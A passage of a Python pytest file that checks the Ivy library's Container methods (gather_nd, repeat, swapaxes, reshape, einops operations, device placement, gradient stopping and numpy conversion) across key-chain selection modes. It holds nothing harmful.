            "d": ivy.array([[[2, 4], [6, 8]], [[10, 12], [14, 16]]], device=device),
        },
    }
    container = Container(dict_in)
    # without key_chains specification
    container_gathered = container.gather_nd(ivy.array([[0, 1], [1, 0]], device=device))
    assert np.allclose(
        ivy.to_numpy(container_gathered["a"]), np.array([[3, 4], [5, 6]])
    )
    assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([[3, 4], [5, 6]]))
    assert np.allclose(
        ivy.to_numpy(container_gathered["b"]["c"]), np.array([[6, 5], [4, 3]])
    )
    assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
    assert np.allclose(
        ivy.to_numpy(container_gathered["b"]["d"]), np.array([[6, 8], [10, 12]])
    )
    assert np.allclose(
        ivy.to_numpy(container_gathered.b.d), np.array([[6, 8], [10, 12]])
    )
    # with key_chains to apply
    container_gathered = container.gather_nd(
        ivy.array([[0, 1], [1, 0]], device=device), ["a", "b/c"]
    )
    assert np.allclose(
        ivy.to_numpy(container_gathered["a"]), np.array([[3, 4], [5, 6]])
    )
    assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([[3, 4], [5, 6]]))
    assert np.allclose(
        ivy.to_numpy(container_gathered["b"]["c"]), np.array([[6, 5], [4, 3]])
    )
    assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
    # b/d was not selected, so it is passed through unchanged
    assert np.allclose(
        ivy.to_numpy(container_gathered["b"]["d"]),
        np.array([[[2, 4], [6, 8]], [[10, 12], [14, 16]]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_gathered.b.d),
        np.array([[[2, 4], [6, 8]], [[10, 12], [14, 16]]]),
    )
    # with key_chains to apply pruned
    container_gathered = container.gather_nd(
        ivy.array([[0, 1], [1, 0]], device=device), ["a", "b/c"], prune_unapplied=True
    )
    assert np.allclose(
        ivy.to_numpy(container_gathered["a"]), np.array([[3, 4], [5, 6]])
    )
    assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([[3, 4], [5, 6]]))
    assert np.allclose(
        ivy.to_numpy(container_gathered["b"]["c"]), np.array([[6, 5], [4, 3]])
    )
    assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
    # b/d was not selected and pruning is on, so it is removed entirely
    assert "b/d" not in container_gathered
    # with key_chains to not apply
    container_gathered = container.gather_nd(
        ivy.array([[0, 1], [1, 0]], device=device),
        Container({"a": None, "b": {"d": None}}),
        to_apply=False,
    )
    # excluded leaves keep their original values
    assert np.allclose(
        ivy.to_numpy(container_gathered["a"]),
        np.array([[[1, 2], [3, 4]], [[5, 6], [7, 8]]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_gathered.a),
        np.array([[[1, 2], [3, 4]], [[5, 6], [7, 8]]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_gathered["b"]["c"]), np.array([[6, 5], [4, 3]])
    )
    assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
    assert np.allclose(
        ivy.to_numpy(container_gathered["b"]["d"]),
        np.array([[[2, 4], [6, 8]], [[10, 12], [14, 16]]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_gathered.b.d),
        np.array([[[2, 4], [6, 8]], [[10, 12], [14, 16]]]),
    )
    # with key_chains to not apply pruned
    container_gathered = container.gather_nd(
        ivy.array([[0, 1], [1, 0]], device=device),
        Container({"a": None, "b": {"d": None}}),
        to_apply=False,
        prune_unapplied=True,
    )
    # excluded leaves are pruned from the result
    assert "a" not in container_gathered
    assert np.allclose(
        ivy.to_numpy(container_gathered["b"]["c"]), np.array([[6, 5], [4, 3]])
    )
    assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
    assert "b/d" not in container_gathered
def test_container_repeat(device, call):
    """Test ``Container.repeat`` with per-element repeat counts given as an
    array, across the key-chain selection modes (apply-to-all, selected
    chains with/without pruning, excluded chains with/without pruning).
    """
    if call is helpers.mx_call:
        # MXNet does not support repeats specified as array
        pytest.skip()
    dict_in = {
        "a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
        "b": {
            "c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
            "d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
        },
    }
    container = Container(dict_in)
    # without key_chains specification
    # repeats [2, 1, 0, 3] duplicate/drop elements along the last axis
    container_repeated = container.repeat(ivy.array([2, 1, 0, 3], device=device), -1)
    assert np.allclose(
        ivy.to_numpy(container_repeated["a"]),
        np.array([[0.0, 0.0, 1.0, 3.0, 3.0, 3.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_repeated.a), np.array([[0.0, 0.0, 1.0, 3.0, 3.0, 3.0]])
    )
    assert np.allclose(
        ivy.to_numpy(container_repeated["b"]["c"]),
        np.array([[5.0, 5.0, 10.0, 20.0, 20.0, 20.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_repeated.b.c),
        np.array([[5.0, 5.0, 10.0, 20.0, 20.0, 20.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_repeated["b"]["d"]),
        np.array([[10.0, 10.0, 9.0, 7.0, 7.0, 7.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_repeated.b.d),
        np.array([[10.0, 10.0, 9.0, 7.0, 7.0, 7.0]]),
    )
    # with key_chains to apply
    container_repeated = container.repeat(
        ivy.array([2, 1, 0, 3], device=device), -1, ["a", "b/c"]
    )
    assert np.allclose(
        ivy.to_numpy(container_repeated["a"]),
        np.array([[0.0, 0.0, 1.0, 3.0, 3.0, 3.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_repeated.a), np.array([[0.0, 0.0, 1.0, 3.0, 3.0, 3.0]])
    )
    assert np.allclose(
        ivy.to_numpy(container_repeated["b"]["c"]),
        np.array([[5.0, 5.0, 10.0, 20.0, 20.0, 20.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_repeated.b.c),
        np.array([[5.0, 5.0, 10.0, 20.0, 20.0, 20.0]]),
    )
    # b/d was not selected, so it is passed through unchanged
    assert np.allclose(
        ivy.to_numpy(container_repeated["b"]["d"]), np.array([[10.0, 9.0, 8.0, 7.0]])
    )
    assert np.allclose(
        ivy.to_numpy(container_repeated.b.d), np.array([[10.0, 9.0, 8.0, 7.0]])
    )
    # with key_chains to apply pruned
    container_repeated = container.repeat(
        ivy.array([2, 1, 0, 3], device=device), -1, ["a", "b/c"], prune_unapplied=True
    )
    assert np.allclose(
        ivy.to_numpy(container_repeated["a"]),
        np.array([[0.0, 0.0, 1.0, 3.0, 3.0, 3.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_repeated.a), np.array([[0.0, 0.0, 1.0, 3.0, 3.0, 3.0]])
    )
    assert np.allclose(
        ivy.to_numpy(container_repeated["b"]["c"]),
        np.array([[5.0, 5.0, 10.0, 20.0, 20.0, 20.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_repeated.b.c),
        np.array([[5.0, 5.0, 10.0, 20.0, 20.0, 20.0]]),
    )
    # unapplied leaf pruned from the result
    assert "b/d" not in container_repeated
    # with key_chains to not apply
    container_repeated = container.repeat(
        ivy.array([2, 1, 0, 3], device=device),
        -1,
        Container({"a": None, "b": {"d": None}}),
        to_apply=False,
    )
    # excluded leaves keep their original values
    assert np.allclose(
        ivy.to_numpy(container_repeated["a"]), np.array([[0.0, 1.0, 2.0, 3.0]])
    )
    assert np.allclose(
        ivy.to_numpy(container_repeated.a), np.array([[0.0, 1.0, 2.0, 3.0]])
    )
    assert np.allclose(
        ivy.to_numpy(container_repeated["b"]["c"]),
        np.array([[5.0, 5.0, 10.0, 20.0, 20.0, 20.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_repeated.b.c),
        np.array([[5.0, 5.0, 10.0, 20.0, 20.0, 20.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_repeated["b"]["d"]), np.array([[10.0, 9.0, 8.0, 7.0]])
    )
    assert np.allclose(
        ivy.to_numpy(container_repeated.b.d), np.array([[10.0, 9.0, 8.0, 7.0]])
    )
    # with key_chains to not apply pruned
    container_repeated = container.repeat(
        ivy.array([2, 1, 0, 3], device=device),
        -1,
        Container({"a": None, "b": {"d": None}}),
        to_apply=False,
        prune_unapplied=True,
    )
    # excluded leaves are pruned from the result
    assert "a" not in container_repeated
    assert np.allclose(
        ivy.to_numpy(container_repeated["b"]["c"]),
        np.array([[5.0, 5.0, 10.0, 20.0, 20.0, 20.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_repeated.b.c),
        np.array([[5.0, 5.0, 10.0, 20.0, 20.0, 20.0]]),
    )
    assert "b/d" not in container_repeated
def test_container_swapaxes(device, call):
    """Test ``Container.swapaxes`` (axes 0 and 1) across the key-chain
    selection modes (apply-to-all, selected chains with/without pruning,
    excluded chains with/without pruning).
    """
    if call is helpers.mx_call:
        # NOTE(review): this comment was copied from the repeat test
        # ("MXNet does not support repeats specified as array"), which does
        # not apply to swapaxes -- presumably MXNet lacks support needed
        # here; confirm the actual reason for the skip.
        pytest.skip()
    dict_in = {
        "a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
        "b": {
            "c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
            "d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
        },
    }
    container = Container(dict_in)
    # without key_chains specification
    # swapping axes 0 and 1 transposes each (1, 4) leaf to (4, 1)
    container_swapped = container.swapaxes(0, 1)
    assert np.allclose(
        ivy.to_numpy(container_swapped["a"]), np.array([[0.0], [1.0], [2.0], [3.0]])
    )
    assert np.allclose(
        ivy.to_numpy(container_swapped.a), np.array([[0.0], [1.0], [2.0], [3.0]])
    )
    assert np.allclose(
        ivy.to_numpy(container_swapped["b"]["c"]),
        np.array([[5.0], [10.0], [15.0], [20.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_swapped.b.c), np.array([[5.0], [10.0], [15.0], [20.0]])
    )
    assert np.allclose(
        ivy.to_numpy(container_swapped["b"]["d"]),
        np.array([[10.0], [9.0], [8.0], [7.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_swapped.b.d), np.array([[10.0], [9.0], [8.0], [7.0]])
    )
    # with key_chains to apply
    container_swapped = container.swapaxes(0, 1, ["a", "b/c"])
    assert np.allclose(
        ivy.to_numpy(container_swapped["a"]), np.array([[0.0], [1.0], [2.0], [3.0]])
    )
    assert np.allclose(
        ivy.to_numpy(container_swapped.a), np.array([[0.0], [1.0], [2.0], [3.0]])
    )
    assert np.allclose(
        ivy.to_numpy(container_swapped["b"]["c"]),
        np.array([[5.0], [10.0], [15.0], [20.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_swapped.b.c), np.array([[5.0], [10.0], [15.0], [20.0]])
    )
    # b/d was not selected, so it is passed through unchanged
    assert np.allclose(
        ivy.to_numpy(container_swapped["b"]["d"]), np.array([10.0, 9.0, 8.0, 7.0])
    )
    assert np.allclose(
        ivy.to_numpy(container_swapped.b.d), np.array([10.0, 9.0, 8.0, 7.0])
    )
    # with key_chains to apply pruned
    container_swapped = container.swapaxes(0, 1, ["a", "b/c"], prune_unapplied=True)
    assert np.allclose(
        ivy.to_numpy(container_swapped["a"]), np.array([[0.0], [1.0], [2.0], [3.0]])
    )
    assert np.allclose(
        ivy.to_numpy(container_swapped.a), np.array([[0.0], [1.0], [2.0], [3.0]])
    )
    assert np.allclose(
        ivy.to_numpy(container_swapped["b"]["c"]),
        np.array([[5.0], [10.0], [15.0], [20.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_swapped.b.c), np.array([[5.0], [10.0], [15.0], [20.0]])
    )
    # unapplied leaf pruned from the result
    assert "b/d" not in container_swapped
    # with key_chains to not apply
    container_swapped = container.swapaxes(
        0, 1, Container({"a": None, "b": {"d": None}}), to_apply=False
    )
    # excluded leaves keep their original values
    assert np.allclose(
        ivy.to_numpy(container_swapped["a"]), np.array([0.0, 1.0, 2.0, 3.0])
    )
    assert np.allclose(
        ivy.to_numpy(container_swapped.a), np.array([0.0, 1.0, 2.0, 3.0])
    )
    assert np.allclose(
        ivy.to_numpy(container_swapped["b"]["c"]),
        np.array([[5.0], [10.0], [15.0], [20.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_swapped.b.c), np.array([[5.0], [10.0], [15.0], [20.0]])
    )
    assert np.allclose(
        ivy.to_numpy(container_swapped["b"]["d"]), np.array([10.0, 9.0, 8.0, 7.0])
    )
    assert np.allclose(
        ivy.to_numpy(container_swapped.b.d), np.array([10.0, 9.0, 8.0, 7.0])
    )
    # with key_chains to not apply pruned
    container_swapped = container.swapaxes(
        0,
        1,
        Container({"a": None, "b": {"d": None}}),
        to_apply=False,
        prune_unapplied=True,
    )
    # excluded leaves are pruned from the result
    assert "a" not in container_swapped
    assert np.allclose(
        ivy.to_numpy(container_swapped["b"]["c"]),
        np.array([[5.0], [10.0], [15.0], [20.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_swapped.b.c), np.array([[5.0], [10.0], [15.0], [20.0]])
    )
    assert "b/d" not in container_swapped
def test_container_reshape(device, call):
    """Test ``Container.reshape`` with its three argument forms: a target
    shape only; a shape applied to a slice of each leaf's dims; and a
    pre-shape, slice, and post-shape combination.
    """
    dict_in = {
        "a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
        "b": {
            "c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
            "d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
        },
    }
    container = Container(dict_in)
    # pre_shape only
    container_reshaped = container.reshape((1, 2, 2))
    assert np.allclose(
        ivy.to_numpy(container_reshaped["a"]), np.array([[0.0, 1.0], [2.0, 3.0]])
    )
    assert np.allclose(
        ivy.to_numpy(container_reshaped.a), np.array([[0.0, 1.0], [2.0, 3.0]])
    )
    assert np.allclose(
        ivy.to_numpy(container_reshaped["b"]["c"]),
        np.array([[5.0, 10.0], [15.0, 20.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_reshaped.b.c), np.array([[5.0, 10.0], [15.0, 20.0]])
    )
    assert np.allclose(
        ivy.to_numpy(container_reshaped["b"]["d"]), np.array([[10.0, 9.0], [8.0, 7.0]])
    )
    assert np.allclose(
        ivy.to_numpy(container_reshaped.b.d), np.array([[10.0, 9.0], [8.0, 7.0]])
    )
    # pre_shape and slice
    dict_in = {
        "a": ivy.array([[[0.0, 1.0, 2.0, 3.0], [0.0, 1.0, 2.0, 3.0]]], device=device),
        "b": {
            "c": ivy.array([[[5.0, 10.0, 15.0], [20.0, 25.0, 30.0]]], device=device),
            "d": ivy.array([[[10.0], [9.0]]], device=device),
        },
    }
    container = Container(dict_in)
    # flatten only the dims from index 2 onward; leading dims untouched
    container_reshaped = container.reshape((-1,), slice(2, None))
    assert np.allclose(
        ivy.to_numpy(container_reshaped["a"]),
        np.array([[0.0, 1.0, 2.0, 3.0], [0.0, 1.0, 2.0, 3.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_reshaped.a),
        np.array([[0.0, 1.0, 2.0, 3.0], [0.0, 1.0, 2.0, 3.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_reshaped["b"]["c"]),
        np.array([[5.0, 10.0, 15.0], [20.0, 25.0, 30.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_reshaped.b.c),
        np.array([[5.0, 10.0, 15.0], [20.0, 25.0, 30.0]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_reshaped["b"]["d"]), np.array([[10.0], [9.0]])
    )
    assert np.allclose(ivy.to_numpy(container_reshaped.b.d), np.array([[10.0], [9.0]]))
    # pre_shape, slice and post_shape
    dict_in = {
        "a": ivy.array([[[0.0, 1.0, 2.0, 3.0], [0.0, 1.0, 2.0, 3.0]]], device=device),
        "b": {
            "c": ivy.array([[[5.0, 10.0, 15.0], [20.0, 25.0, 30.0]]], device=device),
            "d": ivy.array([[[10.0], [9.0]]], device=device),
        },
    }
    container = Container(dict_in)
    # additionally append a trailing unit dim via post_shape (1,)
    container_reshaped = container.reshape((-1,), slice(2, None), (1,))
    assert np.allclose(
        ivy.to_numpy(container_reshaped["a"]),
        np.array([[[0.0], [1.0], [2.0], [3.0]], [[0.0], [1.0], [2.0], [3.0]]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_reshaped.a),
        np.array([[[0.0], [1.0], [2.0], [3.0]], [[0.0], [1.0], [2.0], [3.0]]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_reshaped["b"]["c"]),
        np.array([[[5.0], [10.0], [15.0]], [[20.0], [25.0], [30.0]]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_reshaped.b.c),
        np.array([[[5.0], [10.0], [15.0]], [[20.0], [25.0], [30.0]]]),
    )
    assert np.allclose(
        ivy.to_numpy(container_reshaped["b"]["d"]), np.array([[[10.0]], [[9.0]]])
    )
    assert np.allclose(
        ivy.to_numpy(container_reshaped.b.d), np.array([[[10.0]], [[9.0]]])
    )
def test_container_einops_rearrange(device, call):
    """Test that einops_rearrange applies the pattern to every leaf."""
    container = Container(
        {
            "a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
            "b": {
                "c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
                "d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
            },
        }
    )
    rearranged = container.einops_rearrange("b n -> n b")
    expected = {
        "a": np.array([[0.0], [1.0], [2.0], [3.0]]),
        "b/c": np.array([[5.0], [10.0], [15.0], [20.0]]),
        "b/d": np.array([[10.0], [9.0], [8.0], [7.0]]),
    }
    # key-chain indexing and attribute access must resolve to the same leaves
    for chain, target in expected.items():
        assert np.allclose(ivy.to_numpy(rearranged[chain]), target)
    assert np.allclose(ivy.to_numpy(rearranged.a), expected["a"])
    assert np.allclose(ivy.to_numpy(rearranged.b.c), expected["b/c"])
    assert np.allclose(ivy.to_numpy(rearranged.b.d), expected["b/d"])
def test_container_einops_reduce(device, call):
    """Test that einops_reduce applies the reduction to every leaf."""
    container = Container(
        {
            "a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
            "b": {
                "c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
                "d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
            },
        }
    )
    reduced = container.einops_reduce("b n -> b", "mean")
    # per-leaf means, checked via both indexing and attribute access
    expected = {"a": 1.5, "b/c": 12.5, "b/d": 8.5}
    for chain, mean_val in expected.items():
        assert np.allclose(ivy.to_numpy(reduced[chain]), np.array([mean_val]))
    assert np.allclose(ivy.to_numpy(reduced.a), np.array([1.5]))
    assert np.allclose(ivy.to_numpy(reduced.b.c), np.array([12.5]))
    assert np.allclose(ivy.to_numpy(reduced.b.d), np.array([8.5]))
def test_container_einops_repeat(device, call):
    """Test that einops_repeat applies the repetition pattern to every leaf."""
    container = Container(
        {
            "a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
            "b": {
                "c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
                "d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
            },
        }
    )
    repeated = container.einops_repeat("b n -> b n c", c=2)
    # each element is duplicated along the new trailing axis of size 2
    expected = {
        "a": np.array([[[0.0, 0.0], [1.0, 1.0], [2.0, 2.0], [3.0, 3.0]]]),
        "b/c": np.array([[[5.0, 5.0], [10.0, 10.0], [15.0, 15.0], [20.0, 20.0]]]),
        "b/d": np.array([[[10.0, 10.0], [9.0, 9.0], [8.0, 8.0], [7.0, 7.0]]]),
    }
    for chain, target in expected.items():
        assert np.allclose(ivy.to_numpy(repeated[chain]), target)
    # attribute access resolves to the same leaves
    assert np.allclose(ivy.to_numpy(repeated.a), expected["a"])
    assert np.allclose(ivy.to_numpy(repeated.b.c), expected["b/c"])
    assert np.allclose(ivy.to_numpy(repeated.b.d), expected["b/d"])
def test_container_to_dev(device, call):
    """Test that to_dev places every leaf array on the target device."""
    container = Container(
        {
            "a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
            "b": {
                "c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
                "d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
            },
        }
    )
    moved = container.to_dev(device)
    # every leaf, reached via indexing or attribute access, reports the device
    leaves = (moved["a"], moved.a, moved["b"]["c"], moved.b.c, moved["b"]["d"], moved.b.d)
    for leaf in leaves:
        assert ivy.dev(leaf, as_str=True) == device
def test_container_stop_gradients(device, call):
    """Test ``Container.stop_gradients`` across the key-chain selection
    modes: applied leaves become plain arrays, unapplied leaves stay
    variables (or are pruned when ``prune_unapplied=True``).  Variable
    checks are skipped on numpy, which has no variable/gradient support.
    """
    dict_in = {
        "a": ivy.variable(
            ivy.array(
                [[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]], device=device
            )
        ),
        "b": {
            "c": ivy.variable(
                ivy.array(
                    [[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]], device=device
                )
            ),
            "d": ivy.variable(
                ivy.array(
                    [[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]],
                    device=device,
                )
            ),
        },
    }
    container = Container(dict_in)
    if call is not helpers.np_call:
        # Numpy does not support variables or gradients
        assert ivy.is_variable(container["a"])
        assert ivy.is_variable(container.a)
        assert ivy.is_variable(container["b"]["c"])
        assert ivy.is_variable(container.b.c)
        assert ivy.is_variable(container["b"]["d"])
        assert ivy.is_variable(container.b.d)
    # without key_chains specification
    container_stopped_grads = container.stop_gradients()
    assert ivy.is_ivy_array(container_stopped_grads["a"])
    assert ivy.is_ivy_array(container_stopped_grads.a)
    assert ivy.is_ivy_array(container_stopped_grads["b"]["c"])
    assert ivy.is_ivy_array(container_stopped_grads.b.c)
    assert ivy.is_ivy_array(container_stopped_grads["b"]["d"])
    assert ivy.is_ivy_array(container_stopped_grads.b.d)
    # with key_chains to apply
    container_stopped_grads = container.stop_gradients(key_chains=["a", "b/c"])
    assert ivy.is_ivy_array(container_stopped_grads["a"])
    assert ivy.is_ivy_array(container_stopped_grads.a)
    assert ivy.is_ivy_array(container_stopped_grads["b"]["c"])
    assert ivy.is_ivy_array(container_stopped_grads.b.c)
    if call is not helpers.np_call:
        # Numpy does not support variables or gradients
        assert ivy.is_variable(container_stopped_grads["b"]["d"])
        assert ivy.is_variable(container_stopped_grads.b.d)
    # with key_chains to apply pruned
    container_stopped_grads = container.stop_gradients(
        key_chains=["a", "b/c"], prune_unapplied=True
    )
    assert ivy.is_ivy_array(container_stopped_grads["a"])
    assert ivy.is_ivy_array(container_stopped_grads.a)
    assert ivy.is_ivy_array(container_stopped_grads["b"]["c"])
    assert ivy.is_ivy_array(container_stopped_grads.b.c)
    assert "b/d" not in container_stopped_grads
    # with key_chains to not apply
    container_stopped_grads = container.stop_gradients(
        key_chains=Container({"a": None, "b": {"d": None}}), to_apply=False
    )
    if call is not helpers.np_call:
        # Numpy does not support variables or gradients
        assert ivy.is_variable(container_stopped_grads["a"])
        assert ivy.is_variable(container_stopped_grads.a)
    assert ivy.is_ivy_array(container_stopped_grads["b"]["c"])
    assert ivy.is_ivy_array(container_stopped_grads.b.c)
    if call is not helpers.np_call:
        # Numpy does not support variables or gradients
        assert ivy.is_variable(container_stopped_grads["b"]["d"])
        assert ivy.is_variable(container_stopped_grads.b.d)
    # with key_chains to not apply pruned
    container_stopped_grads = container.stop_gradients(
        key_chains=Container({"a": None, "b": {"d": None}}),
        to_apply=False,
        prune_unapplied=True,
    )
    assert "a" not in container_stopped_grads
    assert ivy.is_ivy_array(container_stopped_grads["b"]["c"])
    assert ivy.is_ivy_array(container_stopped_grads.b.c)
    assert "b/d" not in container_stopped_grads
def test_container_as_variables(device, call):
    """Test that as_variables converts every leaf array into a variable."""
    container = Container(
        {
            "a": ivy.array(
                [[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]], device=device
            ),
            "b": {
                "c": ivy.array(
                    [[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]], device=device
                ),
                "d": ivy.array(
                    [[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]], device=device
                ),
            },
        }
    )
    # every leaf starts out as a plain ivy array
    originals = (
        container["a"], container.a,
        container["b"]["c"], container.b.c,
        container["b"]["d"], container.b.d,
    )
    for leaf in originals:
        assert ivy.is_ivy_array(leaf)
    variable_cont = container.as_variables()
    if call is not helpers.np_call:
        # Numpy does not support variables or gradients
        converted = (
            variable_cont["a"], variable_cont.a,
            variable_cont["b"]["c"], variable_cont.b.c,
            variable_cont["b"]["d"], variable_cont.b.d,
        )
        for leaf in converted:
            assert ivy.is_variable(leaf)
def test_container_as_arrays(device, call):
    """Test that as_arrays converts every variable leaf into a plain array."""
    container = Container(
        {
            "a": ivy.variable(
                ivy.array(
                    [[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]], device=device
                )
            ),
            "b": {
                "c": ivy.variable(
                    ivy.array(
                        [[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]], device=device
                    )
                ),
                "d": ivy.variable(
                    ivy.array(
                        [[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]],
                        device=device,
                    )
                ),
            },
        }
    )
    if call is not helpers.np_call:
        # Numpy does not support variables or gradients
        originals = (
            container["a"], container.a,
            container["b"]["c"], container.b.c,
            container["b"]["d"], container.b.d,
        )
        for leaf in originals:
            assert ivy.is_variable(leaf)
    # without key_chains specification
    container_as_arrays = container.as_arrays()
    converted = (
        container_as_arrays["a"], container_as_arrays.a,
        container_as_arrays["b"]["c"], container_as_arrays.b.c,
        container_as_arrays["b"]["d"], container_as_arrays.b.d,
    )
    for leaf in converted:
        assert ivy.is_ivy_array(leaf)
def test_container_num_arrays(device, call):
    """Test ``Container.num_arrays``: it counts leaf arrays, and variables
    are excluded from the count except on backends that do not distinguish
    variables from arrays (numpy, jax).
    """
    dict_in = {
        "a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
        "b": {
            "c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
            "d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
        },
    }
    container = Container(dict_in)
    assert container.num_arrays() == 3
    dict_in = {
        "a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
        "b": {
            "c": ivy.variable(ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device)),
            "d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
        },
    }
    container = Container(dict_in)
    # BUG FIX: the original `assert (x == 3 if cond else 2)` parsed as
    # `(x == 3) if cond else 2`, so on backends other than numpy/jax the
    # assert evaluated the truthy constant 2 and never tested anything.
    expected = 3 if call in [helpers.np_call, helpers.jnp_call] else 2
    assert container.num_arrays() == expected
def test_container_size_ordered_arrays(device, call):
    """Test size_ordered_arrays: leaves are flattened under '__'-joined
    keys and iterate in ascending order of array size."""
    container = Container(
        {
            "a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
            "b": {
                "c": ivy.array([[5.0, 10.0]], device=device),
                "d": ivy.array([[10.0, 9.0, 8.0]], device=device),
            },
        }
    )
    size_ordered = container.size_ordered_arrays()
    flat_expected = {
        "a": np.array([[0.0, 1.0, 2.0, 3.0]]),
        "b__c": np.array([[5.0, 10.0]]),
        "b__d": np.array([[10.0, 9.0, 8.0]]),
    }
    for flat_key, target in flat_expected.items():
        assert np.allclose(ivy.to_numpy(getattr(size_ordered, flat_key)), target)
    # values iterate smallest array first: b__c (2), b__d (3), a (4)
    ascending = [flat_expected["b__c"], flat_expected["b__d"], flat_expected["a"]]
    for value, target in zip(size_ordered.values(), ascending):
        assert np.allclose(ivy.to_numpy(value), target)
def test_container_to_numpy(device, call):
    """Test ``Container.to_numpy``: every (variable) leaf is converted
    into a raw ``np.ndarray``.
    """
    dict_in = {
        "a": ivy.variable(
            ivy.array(
                [[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]], device=device
            )
        ),
        "b": {
            "c": ivy.variable(
                ivy.array(
                    [[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]], device=device
                )
            ),
            "d": ivy.variable(
                ivy.array(
                    [[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]],
                    device=device,
                )
            ),
        },
    }
    container = Container(dict_in)
    # before conversion
    assert ivy.is_ivy_array(container["a"])
    assert ivy.is_ivy_array(container.a)
    assert ivy.is_ivy_array(container["b"]["c"])
    assert ivy.is_ivy_array(container.b.c)
    assert ivy.is_ivy_array(container["b"]["d"])
    assert ivy.is_ivy_array(container.b.d)
    # after conversion
    container_to_numpy = container.to_numpy()
    assert isinstance(container_to_numpy["a"], np.ndarray)
    assert isinstance(container_to_numpy.a, np.ndarray)
    assert isinstance(container_to_numpy["b"]["c"], np.ndarray)
    assert isinstance(container_to_numpy.b.c, np.ndarray)
    assert isinstance(container_to_numpy["b"]["d"], np.ndarray)
    assert isinstance(container_to_numpy.b.d, np.ndarray)
def test_container_from_numpy(device, call):
    """Test that from_numpy converts every numpy leaf into an ivy array."""
    container = Container(
        {
            "a": np.array([[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]]),
            "b": {
                "c": np.array([[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]]),
